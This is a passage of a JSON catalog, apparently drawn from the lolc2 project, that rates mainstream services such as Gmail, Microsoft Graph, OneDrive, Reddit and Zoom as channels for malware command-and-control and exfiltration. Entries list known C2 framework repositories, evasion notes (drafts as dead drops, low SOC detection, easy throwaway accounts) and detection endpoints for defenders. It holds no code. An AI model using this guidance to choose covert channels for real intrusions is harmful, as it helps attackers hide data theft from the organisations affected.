      "mfa": true,
      "notes": "OAuth 2.0 for API \u00b7 No enterprise SSO"
    },
    "knownC2": [
      {
        "name": "XC2 (lolc2 official)",
        "url": "https://github.com/lolc2/XC2"
      },
      {
        "name": "LarryChatter",
        "url": "https://github.com/ZeroDollarSecurity/LarryChatter"
      },
      {
        "name": "twittor",
        "url": "https://github.com/PaulSec/twittor"
      },
      {
        "name": "Social-media-c2",
        "url": "https://github.com/woj-ciech/Social-media-c2"
      }
    ],
    "exfilTools": [
      {
        "name": "DET",
        "url": "https://github.com/sensepost/DET",
        "note": "Twitter plugin for multi-channel exfil"
      }
    ],
    "mitre": [
      "T1102.002",
      "T1071.001"
    ],
    "refs": [
      {
        "title": "X API Documentation",
        "url": "https://developer.x.com/en/docs/twitter-api"
      },
      {
        "title": "lolc2 - X/Twitter",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "api.x.com/2/tweets",
      "api.x.com/2/dm_conversations",
      "api.x.com/2/users/*/tweets",
      "api.x.com/2/users/me"
    ],
    "notes": "4 lolc2 C2 frameworks. XC2 is the official lolc2 project using new X API. DMs, tweets, and bio updates for C2 data. t.co shortlinks for phishing. Detection: high-frequency GETs to /users/<id>/tweets, POSTs to /tweets, PATCH to /users/me",
    "customDomain": false,
    "customDomainNotes": "N/A - social platform",
    "dataRetention": "Permanent (public tweets)",
    "rateLimits": "API Basic: 100 tweets/read/mo. Free: 1500 tweets/write/mo",
    "maxFileSize": "N/A",
    "logging": "No audit logs for users",
    "lolc2Url": "https://lolc2.github.io/#twitter"
  },
  {
    "name": "Gmail / Google Workspace",
    "url": "https://mail.google.com",
    "category": "C2 Channel",
    "provider": "Google",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "mail.google.com",
      "www.googleapis.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [
      "www.googleapis.com/gmail/*",
      "www.googleapis.com/auth/*"
    ],
    "opsec": "low",
    "opsecNotes": "Gmail drafts as dead drops (never sent = no email logs). 5 known C2 frameworks. OAuth consent phishing for initial access",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Google abuse team focuses on spam, not API C2. OAuth app review for production",
    "verification": "Google account (email). Phone for recovery. No CC",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "15GB storage \u00b7 Gmail API free with OAuth \u00b7 Workspace 14-day trial \u00b7 Apps Script 6min exec/day"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Workspace SAML/OIDC federation \u00b7 OAuth consent phishing for Gmail scope"
    },
    "knownC2": [
      {
        "name": "gcat",
        "url": "https://github.com/byt3bl33d3r/gcat"
      },
      {
        "name": "gmailc2",
        "url": "https://github.com/machine1337/gmailc2"
      },
      {
        "name": "SharpGmailC2",
        "url": "https://github.com/reveng007/SharpGmailC2"
      },
      {
        "name": "PSGSHELL",
        "url": "https://github.com/rschwass/PSGSHELL"
      },
      {
        "name": "GmailBackdoor",
        "url": "https://github.com/shanefarris/GmailBackdoor"
      }
    ],
    "exfilTools": [
      {
        "name": "DET",
        "url": "https://github.com/sensepost/DET",
        "note": "SMTP/IMAP Gmail plugin for multi-channel exfil"
      }
    ],
    "mitre": [
      "T1102.002",
      "T1567.002",
      "T1071.003"
    ],
    "refs": [
      {
        "title": "Google Workspace Pricing",
        "url": "https://workspace.google.com/pricing"
      },
      {
        "title": "Gmail API Docs",
        "url": "https://developers.google.com/gmail/api"
      },
      {
        "title": "lolc2 - Gmail",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "www.googleapis.com/gmail/*",
      "www.googleapis.com/auth/*",
      "imap.google.com"
    ],
    "notes": "5 lolc2 C2 frameworks. Gmail drafts as dead drops - never sent means no email delivery logs. OAuth consent phishing for initial access and persistent API access. Detection: anomalous DNS calls to imap.google.com",
    "customDomain": false,
    "customDomainNotes": "N/A - email platform",
    "dataRetention": "Permanent (15GB shared with Drive)",
    "rateLimits": "Gmail API: 250 quota units/s",
    "maxFileSize": "25MB attachment. 10GB via Drive link",
    "logging": "Workspace Audit Logs, Alert Center. Admin SDK Reports API",
    "lolc2Url": "https://lolc2.github.io/#gmail"
  },
  {
    "name": "Microsoft Outlook",
    "url": "https://outlook.office.com",
    "category": "C2 Channel",
    "provider": "Microsoft",
    "signup": "email",
    "signupTime": "~5min",
    "domains": [
      "outlook.office.com",
      "graph.microsoft.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [
      "graph.microsoft.com/v1.0/me/MailFolders/drafts/messages",
      "graph.microsoft.com/v1.0/me/messages",
      "outlook.office.com/api/v2.0/me/tasks/*"
    ],
    "opsec": "low",
    "opsecNotes": "Outlook drafts as dead drops via Graph API. Specula uses Outlook as C2 client. 3 known frameworks (including Tasks API)",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Part of M365 ecosystem. Less scrutinized for C2 than consumer platforms",
    "verification": "Microsoft account. M365 dev program free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "M365 trial 30 days \u00b7 Graph API with delegated auth \u00b7 Dev program gives free E5 licenses"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Full M365/Entra SAML/OIDC/SCIM federation"
    },
    "knownC2": [
      {
        "name": "specula",
        "url": "https://github.com/trustedsec/specula"
      },
      {
        "name": "azureOutlookC2",
        "url": "https://github.com/boku7/azureOutlookC2"
      },
      {
        "name": "C3/Outlook365RestTask",
        "url": "https://github.com/WithSecureLabs/C3"
      }
    ],
    "exfilTools": [
      {
        "name": "GraphRunner",
        "url": "https://github.com/dafthack/GraphRunner",
        "note": "Exfil emails via Graph API"
      }
    ],
    "mitre": [
      "T1102.002",
      "T1567.002",
      "T1071.003"
    ],
    "refs": [
      {
        "title": "M365 Developer Program",
        "url": "https://developer.microsoft.com/en-us/microsoft-365/dev-program"
      },
      {
        "title": "lolc2 - Outlook",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "lolc2 - Tasks",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "Matt Ryan: CMD365 Backdoor Uses Outlook Folders as C2 via Graph API",
        "url": "https://mattysplo.it/2025/02/07/graphapi.html"
      }
    ],
    "detection": [
      "graph.microsoft.com/v1.0/me/MailFolders/drafts/messages",
      "graph.microsoft.com/v1.0/me/messages",
      "outlook.office.com/api/v2.0/me/tasks*"
    ],
    "notes": "3 lolc2 C2 frameworks. CMD365: .NET backdoor disguised as Postman, uses Outlook inbox folders as C2 control panel via Graph API. Creates unique folders per infected machine, polls for encoded commands. GoGra: Go-based backdoor using Microsoft mail services for C2 (South Asia media org). M365 dev program gives free E5 trial with full Outlook API access",
    "customDomain": false,
    "customDomainNotes": "N/A - email platform",
    "dataRetention": "Permanent (M365 retention policies)",
    "rateLimits": "Graph API: 10k req/10min",
    "maxFileSize": "150MB attachment (Outlook)",
    "logging": "M365 Audit Logs, Compliance Center",
    "lolc2Url": "https://lolc2.github.io/#microsoft-outlook"
  },
  {
    "name": "Microsoft Graph API",
    "url": "https://graph.microsoft.com",
    "category": "C2 Channel",
    "provider": "Microsoft",
    "signup": "email",
    "signupTime": "~5min",
    "domains": [
      "graph.microsoft.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "graph.microsoft.com/v1.0/*",
      "graph.microsoft.com/beta/*",
      "login.microsoftonline.com/*/oauth2/v2.0/token"
    ],
    "opsec": "low",
    "opsecNotes": "All C2 traffic appears as legitimate graph.microsoft.com HTTPS. GraphStrike tool automates Cobalt Strike over Graph API. OneDrive/SharePoint/Outlook all usable as C2 backends via same API. Free accounts = free infra. Very difficult for defenders to distinguish from legitimate M365 traffic",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "API traffic blends with legitimate M365 usage. Minimal C2-specific detection",
    "verification": "Microsoft account with M365 license or dev program",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free with any M365 account \u00b7 Dev program gives free E5 \u00b7 Delegated and app-only auth"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Full SAML/OIDC/SCIM via Entra ID \u00b7 OAuth delegated and app-only tokens"
    },
    "knownC2": [
      {
        "name": "GraphStrike",
        "url": "https://github.com/RedSiege/GraphStrike"
      },
      {
        "name": "Excel-C2",
        "url": "https://github.com/grantok/Excel-C2"
      },
      {
        "name": "azureOutlookC2",
        "url": "https://github.com/boku7/azureOutlookC2"
      },
      {
        "name": "pac2",
        "url": "https://github.com/NTT-Security-Japan/pac2"
      },
      {
        "name": "GC2-sheet",
        "url": "https://github.com/looCiprian/GC2-sheet"
      },
      {
        "name": "C3/OneDrive",
        "url": "https://github.com/WithSecureLabs/C3"
      },
      {
        "name": "Empire/OneDrive",
        "url": "https://github.com/BC-SECURITY/Empire"
      }
    ],
    "exfilTools": [
      {
        "name": "GraphRunner",
        "url": "https://github.com/dafthack/GraphRunner",
        "note": "Comprehensive M365 exfil via Graph"
      }
    ],
    "mitre": [
      "T1102.002",
      "T1567.002",
      "T1071.001"
    ],
    "refs": [
      {
        "title": "Graph API Docs",
        "url": "https://learn.microsoft.com/en-us/graph/"
      },
      {
        "title": "lolc2 - Microsoft Graph",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "Dark Reading: Microsoft Graph API Emerges as Top Attacker Tool to Plot Data Theft",
        "url": "https://www.darkreading.com/cloud-security/microsoft-graph-api-emerges-as-top-attacker-tool-to-plot-data-theft"
      },
      {
        "title": "Red Siege: GraphStrike - Using Microsoft Graph API for Cobalt Strike C2",
        "url": "https://redsiege.com/blog/2024/01/graphstrike-release/"
      },
      {
        "title": "Symantec: Growing Number of Threats Leveraging Microsoft Graph API",
        "url": "https://www.security.com/threat-intelligence/graph-api-threats"
      },
      {
        "title": "Fortinet: Havoc C2 via SharePoint with Microsoft Graph API",
        "url": "https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2"
      },
      {
        "title": "Matt Ryan: A History of GraphAPI Attacks (GoGra, Grager, BirdyClient, CMD365)",
        "url": "https://mattysplo.it/2025/02/07/graphapi.html"
      },
      {
        "title": "CSA Singapore: Defending Against Threats Leveraging Microsoft Graph API",
        "url": "https://www.csa.gov.sg/alerts-and-advisories/advisories/ad-2024-010/"
      }
    ],
    "detection": [
      "graph.microsoft.com/v1.0/me/drive/*",
      "graph.microsoft.com/v1.0/sites/*",
      "graph.microsoft.com/v1.0/me/chats",
      "login.microsoftonline.com/*/oauth2/v2.0/token"
    ],
    "notes": "7 lolc2 C2 frameworks. Graph API is the #1 emerging attacker tool for cloud C2 (Dark Reading 2024). APT malware using Graph API: GoGra (South Asia media org), Grager (Taiwan/HK/Vietnam), BirdyClient (Ukraine), CMD365 (Outlook folder C2), Graphite (encrypted AES-256), FinalDraft (South American targets), Havoc (SharePoint C2). GraphStrike: Cobalt Strike Beacon over graph.microsoft.com (Red Siege). All traffic routes through graph.microsoft.com - extremely difficult to distinguish from legitimate M365 usage. Free OneDrive accounts = free C2 infrastructure. CSA Singapore issued advisory on Graph API abuse",
    "customDomain": false,
    "customDomainNotes": "N/A - API",
    "dataRetention": "Depends on underlying service",
    "rateLimits": "10k req/10min per app",
    "maxFileSize": "Varies by endpoint",
    "logging": "M365 Audit Logs for all Graph API calls",
    "lolc2Url": "https://lolc2.github.io/#microsoft-graph"
  },
  {
    "name": "Microsoft Power Automate",
    "url": "https://make.powerautomate.com",
    "category": "C2 Channel",
    "provider": "Microsoft",
    "signup": "email",
    "signupTime": "~10min",
    "domains": [
      "make.powerautomate.com",
      "*.flow.microsoft.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Abuse legitimate Power Automate flows for C2. pac2 framework combines Power Automate + Teams + Dropbox",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Legitimate automation platform. C2 traffic indistinguishable from normal flows",
    "verification": "M365 account with Power Automate license",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Included with M365 \u00b7 Premium connectors require P1/P2 license \u00b7 Dev program free"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Full M365/Entra SSO"
    },
    "knownC2": [
      {
        "name": "pac2",
        "url": "https://github.com/NTT-Security-Japan/pac2"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1567.002"
    ],
    "refs": [
      {
        "title": "Power Automate Pricing",
        "url": "https://powerautomate.microsoft.com/en-us/pricing/"
      },
      {
        "title": "lolc2 - Power Automate",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "make.powerautomate.com",
      "providers/Microsoft.PowerApps/apis/shared_flowmanagement"
    ],
    "notes": "1 lolc2 framework (pac2). Abuses legitimate Power Automate flows for C2. Combines Teams chat + Dropbox file sync + Power Automate orchestration. Extremely hard to detect as it uses native M365 automation",
    "customDomain": false,
    "customDomainNotes": "N/A - automation platform",
    "dataRetention": "Depends on connected services",
    "rateLimits": "Flow runs: 750/day free",
    "maxFileSize": "N/A",
    "logging": "Power Platform admin center. Flow run history",
    "lolc2Url": "https://lolc2.github.io/#microsoft-power-automate"
  },
  {
    "name": "OneDrive / SharePoint",
    "url": "https://onedrive.live.com",
    "category": "C2 Channel",
    "provider": "Microsoft",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "onedrive.live.com",
      "1drv.ms",
      "*.sharepoint.com",
      "graph.microsoft.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "graph.microsoft.com/v1.0/me/drive/*",
      "graph.microsoft.com/v1.0/sites/*",
      "api.onedrive.com/v1.0/shares/*"
    ],
    "opsec": "low",
    "opsecNotes": "Trusted Microsoft domain. Graph API for automation. 4 known C2 frameworks via OneDrive/SharePoint file operations",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Part of M365. File sharing rarely flagged unless mass-reported",
    "verification": "Microsoft account. 5GB free with any account",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "5GB free (consumer) \u00b7 M365 trial gives 1TB \u00b7 SharePoint 25TB pool \u00b7 Dev program free E5"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "M365/Entra SAML/OIDC/SCIM federation \u00b7 Graph API with delegated OAuth"
    },
    "knownC2": [
      {
        "name": "C3/OneDrive",
        "url": "https://github.com/WithSecureLabs/C3"
      },
      {
        "name": "Empire/OneDrive",
        "url": "https://github.com/BC-SECURITY/Empire"
      },
      {
        "name": "Excel-C2",
        "url": "https://github.com/grantok/Excel-C2"
      },
      {
        "name": "GraphStrike",
        "url": "https://github.com/RedSiege/GraphStrike"
      },
      {
        "name": "GC2-sheet (SP)",
        "url": "https://github.com/looCiprian/GC2-sheet"
      }
    ],
    "exfilTools": [
      {
        "name": "onedrive CLI",
        "url": "https://lolexfil.github.io/#tool=OneDrive%20sync%20/%20onedrive%20CLI",
        "note": ""
      },
      {
        "name": "rclone",
        "url": "https://lolexfil.github.io/#tool=rclone",
        "note": ""
      },
      {
        "name": "duplicacy",
        "url": "https://lolexfil.github.io/#tool=duplicacy",
        "note": ""
      },
      {
        "name": "GoodSync",
        "url": "https://lolexfil.github.io/#tool=GoodSync",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1566.002",
      "T1102.002"
    ],
    "refs": [
      {
        "title": "OneDrive Plans",
        "url": "https://www.microsoft.com/en-us/microsoft-365/onedrive/compare-onedrive-plans"
      },
      {
        "title": "Graph API OneDrive",
        "url": "https://learn.microsoft.com/en-us/graph/api/resources/onedrive"
      },
      {
        "title": "lolc2 - OneDrive",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "lolc2 - SharePoint",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "lolexfil",
        "url": "https://lolexfil.github.io"
      },
      {
        "title": "Symantec: BirdyClient Malware Uses OneDrive as C2 Server via Graph API",
        "url": "https://www.security.com/threat-intelligence/graph-api-threats"
      },
      {
        "title": "Fortinet: Havoc SharePoint C2 via Microsoft Graph API",
        "url": "https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2"
      }
    ],
    "detection": [
      "graph.microsoft.com/v1.0/me/drive/root:/*",
      "graph.microsoft.com/v1.0/sites/*/drives",
      "api.onedrive.com/v1.0/shares/*/driveitem/content"
    ],
    "notes": "5 lolc2 C2 frameworks. APT campaigns using OneDrive/SharePoint as C2: BirdyClient (Ukraine 2024, DLL mimicking Apoint), Grager (Chinese APT UNC5330, Taiwan/HK/Vietnam), Havoc framework (SharePoint C2 with AES-256-CTR via Graph API). Free 5GB OneDrive = free C2 storage. GraphRunner for automated M365 abuse. All traffic via graph.microsoft.com trusted domain",
    "customDomain": false,
    "customDomainNotes": "N/A - file storage",
    "dataRetention": "Permanent (5GB free OneDrive)",
    "rateLimits": "Graph API limits apply",
    "maxFileSize": "250GB per file",
    "logging": "M365 Audit Logs, DLP policies",
    "lolc2Url": "https://lolc2.github.io/#onedrive"
  },
  {
    "name": "YouTube",
    "url": "https://youtube.com",
    "category": "C2 Channel",
    "provider": "Google",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "youtube.com",
      "www.googleapis.com/youtube/*"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "www.googleapis.com/youtube/*",
      "www.googleapis.com/youtube/v3/commentThreads*"
    ],
    "opsec": "low",
    "opsecNotes": "Video descriptions and comments for C2 instructions. 3 known C2 frameworks. Universally allowed - never blocked",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Comment/description C2 is extremely stealthy. No API abuse detection for read operations",
    "verification": "Google account. Phone for channel creation",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free \u00b7 API 10k units/day \u00b7 Unlimited uploads with verification"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Google OAuth for API \u00b7 No standalone SSO"
    },
    "knownC2": [
      {
        "name": "YoutubeAsAC2",
        "url": "https://github.com/latortuga71/YoutubeAsAC2"
      },
      {
        "name": "Social-media-c2",
        "url": "https://github.com/woj-ciech/Social-media-c2"
      },
      {
        "name": "SharpCovertTube",
        "url": "https://github.com/ricardojoserf/SharpCovertTube"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1071.001"
    ],
    "refs": [
      {
        "title": "YouTube Data API",
        "url": "https://developers.google.com/youtube/v3"
      },
      {
        "title": "lolc2 - YouTube",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "www.googleapis.com/youtube/*",
      "www.googleapis.com/youtube/v3/commentThreads?key=*"
    ],
    "notes": "3 lolc2 C2 frameworks. SharpCovertTube uses video QR codes for C2 commands. Video descriptions/comments as dead drops. Universally allowed domain - no proxy will block youtube.com",
    "customDomain": false,
    "customDomainNotes": "N/A - video platform",
    "dataRetention": "Permanent (videos)",
    "rateLimits": "YouTube Data API: 10k units/day",
    "maxFileSize": "256GB or 12hr per video",
    "logging": "YouTube Studio analytics. No API audit logs",
    "lolc2Url": "https://lolc2.github.io/#youtube"
  },
  {
    "name": "Reddit",
    "url": "https://reddit.com",
    "category": "C2 Channel",
    "provider": "Reddit",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "reddit.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "www.reddit.com/api/*",
      "oauth.reddit.com/api/*"
    ],
    "opsec": "low",
    "opsecNotes": "Posts and comments as C2 instructions. Subreddits for compartmentalized channels. Rarely monitored",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal API abuse detection. Subreddits rarely monitored for C2",
    "verification": "Email only. No phone required. Throwaway accounts easy",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free \u00b7 API 100 req/min with OAuth"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "OAuth for API \u00b7 No enterprise SSO"
    },
    "knownC2": [
      {
        "name": "RedditC2",
        "url": "https://github.com/kleiton0x00/RedditC2"
      },
      {
        "name": "reddit-c2",
        "url": "https://github.com/thrasr/reddit-c2"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Reddit API",
        "url": "https://www.reddit.com/dev/api/"
      },
      {
        "title": "lolc2 - Reddit",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "www.reddit.com/api/*"
    ],
    "notes": "2 lolc2 C2 frameworks. Posts/comments as dead drops. Create private subreddits for compartmentalized C2 channels. Universally allowed domain",
    "customDomain": false,
    "customDomainNotes": "N/A - social platform",
    "dataRetention": "Permanent (posts)",
    "rateLimits": "OAuth API: 60 req/min. 100 listing items",
    "maxFileSize": "20MB image. 1GB video",
    "logging": "No audit logs for users. Mod logs per subreddit",
    "lolc2Url": "https://lolc2.github.io/#reddit"
  },
  {
    "name": "Instagram",
    "url": "https://instagram.com",
    "category": "C2 Channel",
    "provider": "Meta",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "*.instagram.com",
      "graph.instagram.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.instagram.com/oauth/*",
      "graph.instagram.com/*"
    ],
    "opsec": "low",
    "opsecNotes": "Posts/comments for C2 data. Rarely monitored for C2 activity",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "API requires Facebook developer approval. Less practical for C2",
    "verification": "Email/phone. Facebook developer portal for API access",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free \u00b7 API via Facebook Developer portal"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Facebook/Meta OAuth \u00b7 No enterprise SSO"
    },
    "knownC2": [
      {
        "name": "Social-media-c2",
        "url": "https://github.com/woj-ciech/Social-media-c2"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1071.001"
    ],
    "refs": [
      {
        "title": "Instagram Graph API",
        "url": "https://developers.facebook.com/docs/instagram-api"
      },
      {
        "title": "lolc2 - Instagram",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "api.instagram.com/oauth/*",
      "graph.instagram.com/*"
    ],
    "notes": "1 lolc2 C2 framework (Social-media-c2). Posts/comments for C2 data. Image steganography possible via uploads",
    "customDomain": false,
    "customDomainNotes": "N/A - social platform",
    "dataRetention": "Permanent",
    "rateLimits": "Graph API: 200 calls/hr",
    "maxFileSize": "N/A",
    "logging": "No audit logs",
    "lolc2Url": "https://lolc2.github.io/#instagram"
  },
  {
    "name": "Notion",
    "url": "https://notion.so",
    "category": "C2 Channel",
    "provider": "Notion",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "*.notion.site",
      "notion.so",
      "api.notion.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "api.notion.com/*"
    ],
    "opsec": "low",
    "opsecNotes": "Full-featured C2 via OffensiveNotion. Public pages on trusted domain for phishing. API for programmatic C2",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "No known abuse enforcement against API C2. Pages rarely scanned",
    "verification": "Email only. No phone. No CC for free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: unlimited pages \u00b7 5MB uploads \u00b7 API unlimited \u00b7 Plus trial 7 days"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Enterprise ($20/u/mo) \u00b7 OAuth for integrations"
    },
    "knownC2": [
      {
        "name": "OffensiveNotion",
        "url": "https://github.com/mttaggart/OffensiveNotion"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1567.002",
      "T1566.002"
    ],
    "refs": [
      {
        "title": "Notion Pricing",
        "url": "https://www.notion.so/pricing"
      },
      {
        "title": "Notion SAML SSO",
        "url": "https://www.notion.so/help/set-up-saml-sso"
      },
      {
        "title": "Notion API",
        "url": "https://developers.notion.com/"
      },
      {
        "title": "lolc2 - Notion",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "Darktrace: Fake Startup Companies Use Notion for Hosting Malicious Documentation",
        "url": "https://thehackernews.com/search/label/Discord"
      }
    ],
    "detection": [
      "api.notion.com*"
    ],
    "notes": "1 lolc2 C2 framework (OffensiveNotion - full featured). Trusted domain for phishing. Public pages as dead drops. API for programmatic C2. Cross-platform agent (Windows/Linux/macOS). Fake AI/gaming/Web3 startups use Notion for hosting malicious project documentation to lure victims (Darktrace 2025)",
    "customDomain": false,
    "customDomainNotes": "N/A - productivity app",
    "dataRetention": "Permanent (free: 7 day page history)",
    "rateLimits": "API: 3 req/s",
    "maxFileSize": "5MB per file block",
    "logging": "Audit log on Enterprise",
    "lolc2Url": "https://lolc2.github.io/#notion"
  },
  {
    "name": "Zoom",
    "url": "https://zoom.us",
    "category": "C2 Channel",
    "provider": "Zoom",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "zoom.us",
      "api.zoom.us"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.zoom.us/v2/chat/users/me/*"
    ],
    "opsec": "low",
    "opsecNotes": "Chat API for C2. Meeting invites for phishing. Rarely monitored for C2",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Chat API rarely monitored. Meeting invites trusted by email filters",
    "verification": "Email required. Phone for free account verification in some regions",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 40min meetings \u00b7 Chat API with OAuth \u00b7 Marketplace for apps"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Business+ \u00b7 OAuth for API/Apps"
    },
    "knownC2": [
      {
        "name": "ShadowForgeC2",
        "url": "https://github.com/0xEr3bus/ShadowForgeC2"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1566.002"
    ],
    "refs": [
      {
        "title": "Zoom Pricing",
        "url": "https://zoom.us/pricing"
      },
      {
        "title": "Zoom SSO/SAML",
        "url": "https://support.zoom.com/hc/en/article?id=zm_kb&sysparm_article=KB0060720"
      },
      {
        "title": "Zoom API",
        "url": "https://developers.zoom.us/docs/api/"
      },
      {
        "title": "lolc2 - Zoom",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "api.zoom.us/v2/chat/users/me/*"
    ],
    "notes": "1 lolc2 C2 framework (ShadowForgeC2). Chat API for bidirectional C2 via Zoom chat messages. Meeting invites for social engineering. Zoom is trusted by all corporate firewalls",
    "customDomain": false,
    "customDomainNotes": "N/A - video platform",
    "dataRetention": "Cloud recordings: varies by plan",
    "rateLimits": "API: 30 req/s heavy, 80 req/s light",
    "maxFileSize": "N/A",
    "logging": "Admin dashboard on paid plans",
    "lolc2Url": "https://lolc2.github.io/#zoom"
  },
  {
    "name": "Google Calendar",
    "url": "https://calendar.google.com",
    "category": "C2 Channel",
    "provider": "Google",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "calendar.google.com",
      "www.googleapis.com/calendar/*"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
